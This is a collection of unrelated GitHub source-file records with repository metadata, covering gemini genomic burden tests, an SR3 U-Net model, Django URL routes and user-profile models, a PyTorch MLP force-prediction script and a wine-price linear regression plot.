take(n, iterable):\n \"Return first n items of the iterable as a list\"\n return list(islice(iterable, n))\n\n\ndef _get_case_and_control_samples(args):\n query = (\"SELECT * from samples\")\n gq = GeminiQuery.GeminiQuery(args.db)\n gq.run(query)\n cases = []\n controls = []\n for row in gq:\n if int(row[\"phenotype\"]) == 1:\n controls.append(row[\"name\"])\n elif int(row[\"phenotype\"]) == 2:\n cases.append(row[\"name\"])\n return cases, controls\n\n\ndef _calculate_c(n_i, p_0):\n c = 0.0\n singleton_n = 0\n for n in n_i:\n if n < 2:\n singleton_n += n\n continue\n for u in range(n + 1):\n c += _C_term(u, n, p_0)\n if singleton_n >= 2:\n for u in range(singleton_n + 1):\n c += _C_term(u, singleton_n, p_0)\n return c\n\n\ndef _C_term(u, n, p_0):\n p_obs_u = binom(n, p_0).pmf(u)\n return ((u - n * p_0)**2 - n * p_0 * (1 - p_0))**2 * p_obs_u\n\n\ndef _calculate_T(m, p_0, n_i, y_i):\n T = 0.0\n singleton_n = 0\n singleton_y = 0\n for n, y in zip(n_i, y_i):\n if n < 2:\n singleton_n += n\n singleton_y += y\n continue\n T += _variant_T_term(p_0, n, y)\n if singleton_n >= 2:\n T += _variant_T_term(p_0, singleton_n, singleton_y)\n return T\n\ndef _variant_T_term(p_0, n_i, y_i):\n return (y_i - n_i * p_0)**2 - n_i * p_0 * (1 - p_0)\n\n\ndef _nonsynonymous_variants(args):\n query = (\"SELECT variant_id, gene from variants WHERE \"\n \"codon_change != 'None'\")\n gq = GeminiQuery.GeminiQuery(args.db)\n gq.run(query, show_variant_samples=True)\n return gq\n\ndef _medium_or_high_impact_variants(args):\n query = (\"SELECT variant_id, gene from variants\"\n \" WHERE impact_severity != 'LOW'\"\n \" AND aaf >= %s\"\n \" AND aaf <= %s\" % (str(args.min_aaf), str(args.max_aaf)))\n\n gq = GeminiQuery.GeminiQuery(args.db)\n gq.run(query, show_variant_samples=True)\n return gq\n\ndef 
_calculate_counts(gq, samples):\n variants = defaultdict(Counter)\n variants_in_gene = defaultdict(defaultdict)\n for row in gq:\n gene_name = row['gene']\n samples_with_variant = [x for x in row[\"variant_samples\"] if\n x in samples]\n if not gene_name or not samples_with_variant:\n continue\n variants_in_gene[gene_name].update({row['variant_id']:\n samples_with_variant})\n new_counts = Counter(samples_with_variant)\n del new_counts['']\n variants[gene_name] += new_counts\n return variants_in_gene, variants\n\n\ndef _summarize_by_gene_and_sample(args, query):\n gq = GeminiQuery.GeminiQuery(args.db)\n gq.run(query, show_variant_samples=True)\n burden = defaultdict(Counter)\n for row in gq:\n gene_name = row['gene']\n if not gene_name:\n continue\n new_counts = Counter(row[\"het_samples\"])\n # Counter can't do scalar multiplication\n new_counts = new_counts + Counter(row[\"hom_alt_samples\"])\n new_counts = new_counts + Counter(row[\"hom_alt_samples\"])\n\n del new_counts['']\n burden[gene_name] += new_counts\n\n df = DataFrame({})\n for gene_name, counts in burden.items():\n df = df.append(DataFrame(counts, columns=counts.keys(),\n index=[gene_name]))\n df = df.replace(np.NaN, 0)\n df.to_csv(sys.stdout, float_format=\"%d\", sep=\"\\t\", index_label='gene')\n\n\ndef burden(parser, args):\n if args.nonsynonymous and not args.calpha:\n nonsynonymous_by_gene(args)\n elif args.calpha:\n get_calpha(args)\n else:\n burden_by_gene(args)\n\n\n# unit tests of the underlying calculations\ndef _test_calculate_C():\n nn = [4, 10, 5]\n yy = [2, 8, 0]\n correct = 15.250000000000007\n calc = _calculate_c(nn, 0.5)\n assert correct == calc\n\ndef _test_calculate_T():\n nn = [4, 10, 5]\n yy = [2, 8, 0]\n correct = 10.5\n\n calc = sum([_variant_T_term(0.5, n, y) for n, y in zip(nn, yy)])\n assert correct == calc\n","repo_name":"arq5x/gemini","sub_path":"gemini/tool_burden_tests.py","file_name":"tool_burden_tests.py","file_ext":"py","file_size_in_byte":9990,"program_lang":"python","lang":"en","doc_type":"code","stars":305,"dataset":"github-code","pt":"48"} +{"seq_id":"20084280850","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass UNet(nn.Module): \n def __init__(self, C, steps, channel_expansions=[1,2,4,4,8,8], emb_expansion=4, resblock_per_down_stage=3, drp_rate=0.0): # from the original code; set 0.1 for CIFAR10 and 0.0 for the others.\n super().__init__()\n self.emb = GammaEmbedding(steps=steps, dim=C, exp=emb_expansion)\n self.conv1 = Conv2d(2*3, C, 3)\n att_depth = len(channel_expansions)-2\n\n depth = len(channel_expansions) \n last_depth = depth-1\n resblock_per_up_stage = resblock_per_down_stage + 1 # to match block connections between up stage and down stage, where { Down_WideResBlock_1 -> Up_WideResBlock_1 }, { Down_WideResBlock_2 -> Up_WideResBlock_2 }, and { Down_Block -> Up_WideResBlock_3 }\n\n self.down = nn.ModuleList()\n channels = list()\n in_channel = C\n channels.append(in_channel)\n for d in range(depth):\n out_channel = channel_expansions[d] * C\n for _ in range(resblock_per_down_stage):\n res_block = WideResNetBlock(in_channel, out_channel, emb_dimension=emb_expansion*C, attention=d==att_depth, drp_rate=drp_rate)\n in_channel = out_channel\n self.down.append(res_block)\n channels.append(in_channel)\n\n if d < last_depth:\n self.down.append(DownBlock(in_channel, in_channel))\n channels.append(in_channel)\n\n self.mid = nn.ModuleList([\n WideResNetBlock(in_channel, in_channel, emb_dimension=emb_expansion*C, attention=True, drp_rate=drp_rate),\n 
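# bottleneck pair: a residual block with self-attention followed by a plain\n            # residual block, echoing the middle stage of the DDPM U-Net\n            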
WideResNetBlock(in_channel, in_channel, emb_dimension=emb_expansion*C, attention=False, drp_rate=drp_rate)\n ])\n\n self.up = nn.ModuleList()\n for d in reversed(range(depth)):\n out_channel = channel_expansions[d] * C\n for _ in reversed(range(resblock_per_up_stage)):\n res_block = WideResNetBlock(in_channel + channels.pop(), out_channel, emb_dimension=emb_expansion*C, attention=d==att_depth, drp_rate=drp_rate)\n in_channel = out_channel\n self.up.append(res_block)\n \n if d > 0:\n self.up.append(UpBlock(in_channel, in_channel))\n \n del channels\n\n self.gn = GroupNorm(channel_expansions[0]*C)\n self.silu = nn.SiLU()\n self.conv2 = Conv2d(channel_expansions[0]*C, 3, kernel=3, gain=1e-10)\n \n def forward(self, x, gamma):\n\n emb = self.emb(gamma)\n\n connections = list()\n\n z = self.conv1(x)\n connections.append(z)\n\n for module in self.down:\n z = module(z, emb) if isinstance(module, WideResNetBlock) else module(z)\n connections.append(z)\n \n for module in self.mid:\n z = module(z, emb)\n \n for module in self.up:\n z = module(torch.cat((z, connections.pop()), dim=1), emb) if isinstance(module, WideResNetBlock) else module(z)\n \n z = self.gn(z)\n z = self.silu(z)\n out = self.conv2(z)\n\n return out\n\nclass GammaEmbedding(nn.Module):\n def __init__(self, steps, dim, exp):\n super().__init__()\n self.linear1 = Linear(dim, exp*dim)\n self.silu = nn.SiLU()\n self.linear2 = Linear(exp*dim, exp*dim)\n self.dim=dim\n\n x = torch.log(torch.tensor(5000)) / (self.dim//2 - 1) # log( 5000^(1 / (d/2 - 1)) )\n x = torch.exp( torch.arange(0, dim//2) * -x ) # 1 / 5000^(i / (d/2 - 1)) \n self.register_buffer('x', x.reshape((1, -1)))\n\n def forward(self, gamma):\n \n x = gamma.reshape((-1, 1)) * self.x # gamma / 5000^(i / (d/2 - 1))\n emb = torch.concat((torch.sin(x), torch.cos(x)), dim=1) # sin( gamma / 5000^(i / (d/2 - 1)) ) and cos( gamma / 10000^(i / (d/2 - 1)) )\n if self.dim % 2 != 0:\n emb = F.pad(emb, pad=(0, 1)) # add zero pad at last\n \n emb = self.linear1(emb)\n emb = self.silu(emb)\n emb = self.linear2(emb)\n\n return emb # shape = (batch, exp*dim)\n\nclass WideResNetBlock(nn.Module): # DDPM ResBlock\n def __init__(self, in_channel, out_channel, emb_dimension, attention, drp_rate):\n super().__init__()\n self.do_attention = attention\n self.is_match = in_channel == out_channel\n self.C = out_channel\n\n self.gn1 = GroupNorm(in_channel)\n self.silu1 = nn.SiLU()\n self.conv1 = Conv2d(in_channel, out_channel, kernel=3)\n \n self.silu2 = nn.SiLU()\n self.linear1= Linear(emb_dimension, out_channel)\n\n self.gn2 = GroupNorm(out_channel)\n self.silu3 = nn.SiLU()\n self.dropout = nn.Dropout(drp_rate) \n self.conv2 = Conv2d(out_channel, out_channel, kernel=3, gain=1e-10)\n\n if not self.is_match: # to match 'channel' betweem 'x' and 'z'\n self.linear2 = Linear(in_channel, out_channel)\n \n if self.do_attention:\n self.att = SelfAttentionBlock(out_channel) \n \n\n def forward(self, x, emb):\n z = self.gn1(x)\n z = self.silu1(z)\n z = self.conv1(z)\n\n B = x.shape[0]\n C = self.C\n emb = self.silu2(emb)\n z = self.linear1(emb).reshape(B, C, 1, 1) + z\n\n z = self.gn2(z)\n z = self.silu3(z)\n z = self.dropout(z) \n z = self.conv2(z)\n\n if not self.is_match:\n x = x.permute(0, 2, 3, 1) # shape=(B,C,H,W) -> (B,H,W,C)\n x = self.linear2(x)\n x = x.permute(0, 3, 1, 2) # shape=(B,H,W,C) -> (B,C,H,W)\n\n out = x + z\n\n if self.do_attention:\n out = self.att(out)\n \n return out\n\nclass SelfAttentionBlock(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.gn = GroupNorm(dim)\n 
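# a single dim -> 3*dim projection yields Q, K and V in one matmul;\n        # forward() reshapes the output back into the three separate tensors\n        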
self.qkv = Linear(dim, 3*dim)\n self.softmax = nn.Softmax(dim=-1)\n self.proj = Linear(dim, dim, gain=1e-10)\n\n def forward(self, x):\n B, C, H, W = x.shape\n\n z = self.gn(x)\n z = z.permute(0, 2, 3, 1) # shape=(B,C,H,W) -> (B,H,W,C)\n qkv = self.qkv(z).view(B, H*W, 3, C).permute(2,0,1,3) # shape=(B,H,W,3*C) -> (3,B,H*W,C)\n q,k,v = qkv[0], qkv[1], qkv[2] # (B,H*W,C)\n\n w = torch.matmul(q, k.transpose(-2,-1)) / (C**0.5) # shape=(B,H*W,H*W)\n attention = self.softmax(w)\n self_attention = torch.matmul(attention, v) # shape=(B,H*W,C)\n\n z = self.proj(z).permute(0, 3, 1, 2).reshape(B, C, H, W)\n return x + z\n\nclass DownBlock(nn.Module):\n def __init__(self, in_channel, out_channel):\n super().__init__()\n self.conv = Conv2d(in_channel, out_channel, kernel=3, stride=2)\n \n def forward(self, x): \n return self.conv(x)\n\nclass UpBlock(nn.Module):\n def __init__(self, in_channel, out_channel):\n super().__init__()\n self.upsample = nn.Upsample(scale_factor=2, mode='nearest')\n self.conv = Conv2d(in_channel, out_channel, kernel=3)\n \n def forward(self, x): \n x = self.upsample(x)\n x = self.conv(x)\n return x\n\nclass GroupNorm(nn.Module):\n def __init__(self, in_channel, num_groups=8):\n super().__init__()\n self.group_norm = nn.GroupNorm(num_groups=num_groups, num_channels=in_channel) # same as the TensorFlow default\n\n def forward(self, x):\n return self.group_norm(x)\n\nclass Conv2d(nn.Module):\n def __init__(self, in_channel, out_channel, kernel, stride=1, gain=1.0):\n super().__init__()\n self.conv = nn.Conv2d(in_channel, out_channel, kernel, stride, padding=1)\n nn.init.xavier_uniform_(self.conv.weight, gain=torch.sqrt(torch.tensor(gain))) # the original code initialization\n nn.init.constant_(self.conv.bias, 0.0) # the original code initialization\n \n def forward(self, x):\n return self.conv(x)\n\nclass Linear(nn.Module):\n def __init__(self, in_feature, out_feature, gain=1.0):\n super().__init__()\n self.linear = nn.Linear(in_feature, out_feature)\n nn.init.xavier_uniform_(self.linear.weight, gain=torch.sqrt(torch.tensor(gain))) # the original code initialization\n nn.init.constant_(self.linear.bias, 0.0) # the original code initialization\n\n def forward(self, x):\n return self.linear(x)\n\n","repo_name":"novwaul/SR3","sub_path":"UNet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8300,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"6839608552","text":"from django.conf.urls import url\nfrom django.urls import path, include\nfrom . 
import views\nfrom bms.ui_views import main_user_views,user_group_view,agency_views,client_config_views,order_views,rule_views,msg_views,funds_views\n\napp_name = 'bms'\n\nurlpatterns = [\n\t# 首页\n\tpath('login',views.login_page,name='login'),\n\tpath('logout',views.Logout_page,name='logout'),\n\tpath('login_check',views.login_check,name='login_check'),\n\tpath('index', views.index, name='index'),\n\tpath('change_pwd_page',views.change_pwd_page,name='change_pwd_page'),\n\tpath('change_pwd',views.change_pwd,name='change_pwd'),\n\t# 消息管理\n\tpath('show_msg_num',msg_views.show_msg_num,name='show_msg_num'),\n\tpath('msg_center',msg_views.msg_center,name='msg_center'),\n\tpath('msg_list',msg_views.msg_list,name='msg_list'),\n\tpath('have_read_msg',msg_views.have_read_msg,name='have_read_msg'),\n\t# 管理员后台管理\n\tpath('org_user_config',main_user_views.org_user_config,name='org_user_config'),\n\tpath('main_user_list',main_user_views.main_user_list, name='main_user_list'),\n\tpath('add_main_user',main_user_views.add_main_user,name='add_main_user'),\n\tpath('update_main_user',main_user_views.update_main_user,name='update_main_user'),\n\tpath('change_pwd_main_user',main_user_views.change_pwd_main_user,name='change_pwd_main_user'),\n\t# 管理员组后台管理\n\tpath('user_group',user_group_view.user_group,name='user_group'),\n\tpath('group_list',user_group_view.group_list,name='group_list'),\n\tpath('add_user_to_group',user_group_view.add_user_to_group,name='add_user_to_group'),\n\tpath('remove_user_from_group',user_group_view.remove_user_from_group,name='remove_user_from_group'),\n\t# 归属管理\n\tpath('agency_config', agency_views.agency_config, name='agency_config'),\n\tpath('agency_user_config',agency_views.agency_user_config,name='agency_user_config'),\n\tpath('get_agency_group',agency_views.get_agency_group,name='get_agency_group'),\n\tpath('agency_group_config',agency_views.agency_group_config,name='agency_group_config'),\n\tpath('get_agency_tree', agency_views.get_agency_tree, name='get_agency_tree'),\n\tpath('get_agency_list', agency_views.get_agency_list, name='get_agency_list'),\n\tpath('add_agency',agency_views.add_agency,name='add_agency'),\n\tpath('update_agency',agency_views.update_agency,name='update_agency'),\n\tpath('get_allow_business',agency_views.get_allow_business,name='get_allow_business'),\n\t# 配置管理\n\tpath('fund_in_config',rule_views.fund_in_config,name='fund_in_config'),\n\tpath('get_org_tree',rule_views.get_org_tree,name='get_org_tree'),\n\tpath('get_global_fund_in',rule_views.get_global_fund_in,name='get_global_fund_in'),\n\tpath('add_fund_in',rule_views.add_fund_in,name='add_fund_in'),\n\tpath('get_global_fund_out',rule_views.get_global_fund_out,name='get_global_fund_out'),\n\tpath('add_fund_out',rule_views.add_fund_out,name='add_fund_out'),\n\tpath('fund_out_config',rule_views.fund_out_config,name='fund_out_config'),\n\tpath('exchange_config',rule_views.exchange_config,name='exchange_config'),\n\tpath('get_exchange_rule',rule_views.get_exchange_rule,name='get_exchange_rule'),\n\tpath('add_exchange_rule',rule_views.add_exchange_rule,name='add_exchange_rule'),\n\tpath('notional_principal_config',rule_views.notional_principal_config,name='notional_principal_config'),\n\tpath('get_notional_principal',rule_views.get_notional_principal,name='get_notional_principal'),\n\t# 
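client management\n\t# 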
客户管理\n\tpath('client_list',client_config_views.client_list,name='client_list'),\n\tpath('get_client_list',client_config_views.get_client_list,name='get_client_list'),\n\tpath('freeze_client',client_config_views.freeze_client,name='freeze_client'),\n\tpath('change_client_pwd',client_config_views.change_client_pwd,name='change_client_pwd'),\n\tpath('check_client',client_config_views.check_client,name='check_client'),\n\tpath('allow_business',client_config_views.allow_business,name='allow_business'),\n\t# 资金流水\n\tpath('funds_list',funds_views.funds_list,name='funds_list'),\n\tpath('fund_detail_list',funds_views.fund_detail_list,name='fund_detail_list'),\n\tpath('get_fund_audit',funds_views.get_fund_audit,name='get_fund_audit'),\n\tpath('fund_audit',funds_views.fund_audit,name='fund_audit'),\n\tpath('offline_balance_change',funds_views.offline_balance_change,name='offline_balance_change'),\n\t# 订单管理\n\tpath('order_list',order_views.order_list,name='order_list'),\n]\n","repo_name":"NorthAmerica/BusinessManagementSystem","sub_path":"bms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1923402272","text":"import torch\nimport torch.nn.functional as F\nimport pandas as pd\nimport numpy as np\nimport torch.utils.data as Data\nimport pickle\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import r2_score\nfrom sklearn.model_selection import train_test_split\nfrom IPython.display import clear_output\nfrom scipy.io import loadmat\n\n\nDEVICE = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nTRAIN = False\nPREDICT = True\nNET_FEATURES = 'mlp_6641x10_tanhout_10k_e-5_MSEsum_delsecsint'\nFILE_NAME = NET_FEATURES + '.pkl'\nfig_dir = '/home/adriano/Pictures/NN_model_Figures/'\n\n\nclass MLP(torch.nn.Module):\n def __init__(self, D_in, H, D_out):\n super(MLP, self).__init__()\n self.linear1 = torch.nn.Linear(D_in, H)\n self.linear2 = torch.nn.Linear(H, H)\n self.linear3 = torch.nn.Linear(H, H)\n self.linear4 = torch.nn.Linear(H, 2 * H)\n self.linear5 = torch.nn.Linear(2 * H, 4 * H)\n self.linear6 = torch.nn.Linear(4 * H, 2 * H)\n self.linear7 = torch.nn.Linear(2 * H, H)\n self.linear8 = torch.nn.Linear(H, H)\n self.linear9 = torch.nn.Linear(H, H)\n self.linear10 = torch.nn.Linear(H, D_out)\n self.to(DEVICE)\n\n def forward(self, x):\n x = self.linear1(x)\n x = self.linear2(F.relu(x))\n x = self.linear3(F.relu(x))\n x = self.linear4(F.relu(x))\n x = self.linear5(F.relu(x))\n x = self.linear6(F.relu(x))\n x = self.linear7(F.relu(x))\n x = self.linear8(F.relu(x))\n x = self.linear9(F.relu(x))\n y_pred = self.linear10(torch.tanh(x))\n return y_pred\n\n\nclass FullyConnectedNN(torch.nn.Module):\n def __init__(self, input_len, output_len, hidden_dim, depth):\n super(FullyConnectedNN, self).__init__()\n self.input_len = input_len\n self.output_len = output_len\n self.depth = depth\n self.hidden_dim = hidden_dim\n self.fc_layers = torch.nn.Sequential()\n\n for i in range(depth):\n in_features = self.input_len if i == 0 else self.hidden_dim\n self.fc_layers.add_module(f\"fc{i}\", torch.nn.Linear(in_features, self.hidden_dim))\n self.fc_layers.add_module(f\"relu{i}\", torch.nn.ReLU())\n\n self.classifier = torch.nn.Sequential(torch.nn.Linear(self.hidden_dim, self.output_len),\n torch.nn.Softmax(dim=1))\n self.to(DEVICE)\n # print number of parameters\n print(f\"Number of parameters: {sum(p.numel() for p in 
self.parameters() if p.requires_grad)}\")\n\n def forward(self, x):\n x = self.fc_layers(x.view(-1, self.input_len))\n x = self.classifier(x)\n return x\n\n\ndef train(model, epochs, train_loader, val_loader, log_interval, l_rate):\n model.to(DEVICE)\n criterion = torch.nn.MSELoss(reduction='sum')\n optimizer = torch.optim.Adam(model.parameters(), lr=l_rate)\n train_losses = []\n test_losses = []\n test_scores = []\n best_so_far = np.inf\n counter = 0\n for epoch in range(epochs):\n epoch_val_loss = 0\n train_loss = []\n for step, (batch_x, batch_y) in enumerate(train_loader):\n batch_x, batch_y = batch_x.to(DEVICE), batch_y.to(DEVICE)\n y_train_pred = model(batch_x)\n loss = criterion(y_train_pred, batch_y)\n train_loss.append(loss.item())\n # Zero gradients, perform a backward pass, and update the weights.\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n epoch_train_loss = np.sum(train_loss) / len(train_loader)\n train_losses.append(epoch_train_loss)\n model.eval()\n with torch.no_grad():\n y_true = []\n y_pred = []\n for step, (val_x, val_y) in enumerate(val_loader):\n val_x, val_y = val_x.to(DEVICE), val_y.to(DEVICE)\n val_pred = model(val_x)\n loss_val = criterion(val_pred, val_y)\n epoch_val_loss = (epoch_val_loss + loss_val) / len(val_loader)\n labels = torch.argmax(val_y, dim=1).view(-1, 1)\n predicted = torch.argmax(val_pred.data, 1).view(-1, 1)\n y_true.extend(labels.cpu().detach().numpy().tolist())\n y_pred.extend(predicted.cpu().detach().numpy().tolist())\n if epoch_val_loss < best_so_far:\n best_so_far = epoch_val_loss\n counter = 0\n else:\n counter += 1\n if counter > 20:\n clear_output(wait=True)\n\n # plot testing loss\n fig, ax = plt.subplots()\n ax.plot(test_losses, label='Testing Loss')\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Loss')\n ax.legend()\n\n # # plot average f1 score\n # fig, ax = plt.subplots()\n # ax.plot([score['macro avg']['f1-score'] for score in test_scores], label='Testing F1 Score Macro Avg')\n # ax.plot([score['macro avg']['precision'] for score in test_scores],\n # label='Testing Precision Score Macro Avg')\n # ax.plot([score['macro avg']['recall'] for score in test_scores], label='Testing Recall Score Macro Avg')\n # ax.set_xlabel('Epoch')\n # ax.set_ylabel('Score')\n # ax.legend()\n\n plt.show()\n\n # print(\n # f\"Epoch {epoch + 1}/{epochs}: Training Loss: {epoch_train_loss:.4f} Test Loss: {epoch_val_loss:.4f} \\nTest Score:\\n {test_score} \")\n break\n test_losses.append(epoch_val_loss.cpu().detach().numpy().tolist())\n print(\"Iteration: \", epoch, \" Loss: \", epoch_train_loss, \" Validation loss: \", epoch_val_loss)\n test_score = classification_report(y_true, y_pred, zero_division=0, output_dict=False)\n test_scores.append(classification_report(y_true, y_pred, zero_division=0, output_dict=True))\n\n model.train()\n\n if (epoch + 1) % log_interval == 0:\n clear_output(wait=True)\n\n # plot testing loss\n fig, ax = plt.subplots()\n ax.plot(test_losses, label='Testing Loss')\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Loss')\n ax.legend()\n\n # plot average f1 score\n fig, ax = plt.subplots()\n ax.plot([score['macro avg']['f1-score'] for score in test_scores], label='Testing F1 Score Macro Avg')\n ax.plot([score['macro avg']['precision'] for score in test_scores],\n label='Testing Precision Score Macro Avg')\n ax.plot([score['macro avg']['recall'] for score in test_scores], label='Testing Recall Score Macro Avg')\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Score')\n ax.legend()\n\n plt.show()\n\n # print(\n # f\"Epoch {epoch + 
1}/{epochs}: Training Loss: {epoch_train_loss:.4f} Test Loss: {epoch_val_loss:.4f} \\nTest Score:\\n {test_score} \")\n\n# mat_data = loadmat('./data_error_force_delsecsint_norm.mat')\n# dataframe = pd.DataFrame(mat_data)\ndataframe = pd.read_pickle('./dataframe_normalized.pkl')\n\nX = dataframe[\"x\"]\nY = dataframe[\"y\"]\n# X = mat_data['x']\n# Y = mat_data['y']\ndata_x = X[0]\ndata_y = Y[0]\n\ntime = np.linspace(start=0, stop=60, num=data_x.shape[1])\nwindow_size = 1000\n\n# create training and validation set\nseed = 113\nX_tmp, X_test, y_tmp, y_test = train_test_split(np.transpose(data_x), np.transpose(data_y), test_size=0.2, shuffle=False)\nX_train, X_val, y_train, y_val = train_test_split(np.transpose(X_tmp), np.transpose(y_tmp), test_size=0.2, random_state=seed)\ntrain_dataset = Data.TensorDataset(torch.from_numpy(X_train).float(), torch.from_numpy(y_train).float())\nval_dataset = Data.TensorDataset(torch.from_numpy(X_val).float(), torch.from_numpy(y_val).float())\nbatch = 1000\ntrain_loader = Data.DataLoader(dataset=train_dataset, batch_size=batch, shuffle=True)\nval_loader = Data.DataLoader(dataset=val_dataset, batch_size=X_val.shape[0], shuffle=False)\n\nt_train = np.linspace(start=0, stop=time[len(X_tmp)], num=len(X_tmp))\nD_in, H, D_out = X_train.shape[1], 100, y_train.shape[1]\n\nif TRAIN:\n    # initialize model and start training\n    epochs = 10000\n    model = MLP(D_in, H, D_out)\n    train(model=model, epochs=epochs, train_loader=train_loader, val_loader=val_loader, log_interval=epochs,\n          l_rate=1e-5)\n\n    # save model\n    pickle.dump(model, open(FILE_NAME, 'wb'))\n\nif PREDICT:\n    # load model\n    model = pickle.load(open(FILE_NAME, 'rb'))\n\n    # # test metrics\n    # r2_scores = np.empty(data_x.shape[0])\n    # for i in range(data_x.shape[0]):\n    #     out_tensor = model(torch.from_numpy(data_x[i, -D_in:]).float().to(DEVICE))\n    #     out_vector = out_tensor.cpu().detach().numpy()\n    #     r2_scores[i] = r2_score(y_true=data_y[i, -D_out:], y_pred=out_vector)\n\n    # see model predictions\n    idx = np.random.randint(low=0, high=99)\n    pred_tensor = model(torch.from_numpy(data_x[idx, -D_in:]).float().to(DEVICE))\n    prediction = pred_tensor.cpu().detach().numpy()\n\n    # plots\n    plt_time = np.linspace(start=time[D_in], stop=60, num=len(prediction))\n    fig_title = 'predicted vs actual force for experiment n: ' + str(idx)\n\n    plt.figure(2)\n    plt.plot(plt_time, prediction)\n    plt.plot(plt_time, data_y[idx, -D_out:])\n    plt.vlines(50, -0.2, 1.0, colors='r')\n    plt.legend(['prediction', 'truth'])\n    plt.xlabel(\"time\")\n    plt.ylabel(\"force\")\n    plt.grid()\n    plt.title(fig_title)\n    plt.savefig(fig_dir + NET_FEATURES + '_output_' + str(idx) + '.png')\n\n    # plt.figure(3)\n    # plt.plot(r2_scores)\n    # plt.axhline(y = np.mean(r2_scores), color='r')\n    # plt.xlabel(\"experiment n\")\n    # plt.ylabel(\"r2 score\")\n    # plt.grid()\n    # plt.savefig(fig_dir + NET_FEATURES + '_r2score.png')\n\n    plt.show()\n    plt.close()\n\n# idx = np.random.randint(low=0, high=79)\n# X_prova = np.zeros(data_x.shape[1])\n# X_prova[:len(X_tmp)] = X_train[idx, :len(X_tmp)]\n#\n# plt.figure(1)\n# plt.plot(time, data_x[idx, :])\n# plt.plot(time, X_prova)\n# plt.grid()\n#\n# plt.show()\n","repo_name":"adrianoscibilia/human_control_modeling","sub_path":"MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":10176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21726216497","text":"# Create your models here.\n\nfrom django.db import models\nfrom 
django.contrib.auth.models import User\nfrom django.urls import reverse\n\nBRANCH=[\n ('Computer Science and Engineering', 'CSE'),\n ('Mathematics and Computing', 'MNC'),\n ('Electrical and Electronics Engineering', 'EEE'),\n ('Electronics and Communication Engineering', 'ECE'),\n ('Mechanical Engineering', 'ME'),\n ('Engineering Physics', 'EP'),\n ('Data Science and Artificial Intelligence', 'DSAI'),\n ('Chemical Engineering', 'CL'),\n ('Chemical Science and Technology', 'CST'),\n ('Biosciences and Bioengineering', 'BSBE'),\n\n]\n\nYEAR=[\n ('2010', '2010'),\n ('2011', '2011'),\n ('2012', '2012'),\n ('2013', '2013'),\n ('2014', '2014'),\n ('2015', '2015'),\n ('2016', '2016'),\n ('2017', '2017'),\n ('2018', '2018'),\n ('2019', '2019'),\n ('2020', '2020'),\n ('2021', '2021'),\n ('2022', '2022'),\n ('2023', '2023')\n]\n\nPROGRAMME=[\n ('B. Tech.', 'B. Tech'),\n ('M. Tech.', 'M. Tech'),\n ('Ph. D.', 'Ph. D.')\n]\n\nclass UserProfile(models.Model):\n user=models.OneToOneField(User, on_delete=models.CASCADE)\n branch=models.CharField(blank=False, max_length=50 ,choices=BRANCH)\n graduation_year=models.CharField(blank=False, max_length=50, choices=YEAR)\n programme=models.CharField(blank=False, max_length=50, choices=PROGRAMME)\n linkedin=models.CharField(blank=True, max_length=200)\n github=models.CharField(blank=True, max_length=200)\n\n","repo_name":"suryansh1411/Placement-Helper","sub_path":"Placement-Helper/account/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38960904071","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nclass Linear_Regression():\r\n\r\n def __init__(self):\r\n #reading the whole data into wine object\r\n self.wine = pd.read_csv('wine.csv')\r\n\r\n def linear_regression(self, xvalue, yvalue, title, xlabel, ylabel):\r\n y_bottom = 5\r\n y_top = 9\r\n y_range = y_top - y_bottom\r\n\r\n plt.ylim(y_bottom, y_top)\r\n #actual plotting of points, scatter plot\r\n plt.scatter(self.wine[xvalue], self.wine[yvalue])\r\n #regression line which is marked\r\n plt.plot(self.wine[xvalue], 0.5 * self.wine[xvalue] - 1.25 , label= title)\r\n\r\n #for plotting residual\r\n for i in range(0, len(self.wine)):\r\n # first we need the coordinates of the actual point\r\n x_point = self.wine[xvalue][i]\r\n y_point = self.wine[yvalue][i]\r\n # then we need the say how long is the vertical line\r\n # the vertical line must be between 0 and 1\r\n y1 = (y_point - y_bottom) / y_range # scale\r\n y2 = ((0.5 * x_point - 1.25) - y_bottom) / y_range # scale\r\n # now we can plot the vertical RED residual line\r\n plt.axvline(x_point, ymin=y1, ymax=y2, color=\"red\") \r\n\r\n plt.title(title)\r\n plt.xlabel(xlabel)\r\n plt.ylabel(ylabel)\r\n plt.grid()\r\n plt.show()\r\n \r\nlin_reg = Linear_Regression()\r\n#finding correlation coefficient\r\nlin_reg.linear_regression('AGST', 'Price', 'simple linear regression for temp and price', 'Temperature [Celsius]', 'Price')\r\n#in linear regression we can eliminate WinterRain and HarvestRain and Year when we want to decide the price\r\n#so not plotting the regression model for mentioned attributes. 
